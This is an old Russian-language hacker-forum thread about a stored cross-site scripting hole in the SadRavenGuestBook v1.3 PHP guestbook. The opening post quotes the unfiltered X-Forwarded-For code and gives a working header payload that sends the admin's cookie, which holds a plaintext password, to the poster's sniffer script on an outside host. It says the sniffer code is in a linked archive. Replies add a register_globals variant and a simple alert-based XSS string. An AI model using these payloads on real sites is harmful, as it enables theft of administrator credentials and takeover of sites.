ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
active XSS SadRavenGuestBook v1.3 |

01.03.2007, 20:24
|
|
Постоянный
Регистрация: 22.04.2006
Сообщений: 566
Провел на форуме: 1325772
Репутация:
517
|
|
active XSS SadRavenGuestBook v1.3
Недавно ред саратов писал об дырке в этой же буке связанной с файлом пароля, где он хранится в зашифрованном виде, в версии 1.3 эту багу пофиксили, но пароль в куках хранят в открытом виде, значит нам нужна иксс атака)
ошибка заключается в отсутствии фильтрации поля: TTP_X_FORWARDED_FOR
в 103-107 строчках файла index.php
PHP код:
if(empty($ip)):
if (getenv('HTTP_X_FORWARDED_FOR')) { $ip=getenv('HTTP_X_FORWARDED_FOR'); }
else { $ip=getenv('REMOTE_ADDR');}
endif;
мы же можем изменить это поле как угодно! например юзая Mozilla Firefox и плагин ModifyHeaders.
меняем поле TTP_X_FORWARDED_FOR на:
Код HTML:
67.22.83.13><script>img = new Image();img.src = "http://test1.ru/s.php?out="+document.cookie;</script><!-- XSS --
где айпи - отображаемый админу (фальшивый) ну а http://test1.ru/s.php - адрес нашего снифера.
теперь, запостив мессагу с таким TTP_X_FORWARDED_FOR, будем ждать, пока админ не зайдет в админку, и нам на снифер не утекут его куки с ОТКРЫТЫМ(!) паролем.
Следуя пословице лучше 1 раз увидеть, чем 100 раз услышать, ну или 10 раз прочитать, качаем видео (800кб):
http://slil.ru/24013333
В архиве с видео лежит код снифера и более подробный анализ баги.
ЗЫ: плиз, поместите видео на video.antichat.ru  ))
ЗЫЫ: помоему это статья, т.к. есть анализ дырки, а не просто соль) но если модеры так не считают, перенесите плиз в более подходящий раздел.
|
|
|

02.03.2007, 06:23
|
|
Познающий
Регистрация: 17.12.2006
Сообщений: 32
Провел на форуме: 172639
Репутация:
31
|
|
Неплохо. Как-то давно искал баги в этой госте, не нашел ничего. Но то, что пасс в открытом виде хранится - просто глупость автора.
|
|
|

02.04.2007, 17:30
|
|
Постоянный
Регистрация: 22.04.2006
Сообщений: 566
Провел на форуме: 1325772
Репутация:
517
|
|
по просьбе с аськи перезалил видео: http://slil.ru/24172858
|
|
|

02.04.2007, 23:16
|
|
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
Провел на форуме: 749524
Репутация:
715
|
|
думаю стоит заменить на HTTP_X_FORWARDED_FOR
|
|
|

03.04.2007, 00:05
|
|
Познающий
Регистрация: 19.11.2006
Сообщений: 60
Провел на форуме: 320906
Репутация:
63
|
|
А легче просто вместо того чтобы заголовки изменять просто добавить еще одну post или get переменную $ip, если register_globals включены.
Тогда получится что-то вроде этого:
guest
Последний раз редактировалось Stefun; 03.04.2007 в 00:12..
|
|
|

09.08.2007, 04:17
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме: 16641028
Репутация:
2371
|
|
А я вот активку нарыл...
При добавлении сообщений куки сохраняются и активок куча.
Код:
"'/><script>alert(/xss/)</script>
Последний раз редактировалось Isis; 09.08.2007 в 04:24..
|
|
|

09.08.2007, 07:10
|
|
Участник форума
Регистрация: 13.06.2007
Сообщений: 113
Провел на форуме: 4704149
Репутация:
526
|
|
Перезалейте видео на dump.ru
|
|
|

09.08.2007, 22:09
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 937
Провел на форуме: 1948091
Репутация:
1686
|
|
стотья? помойму надо в уязвимости такое постить
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|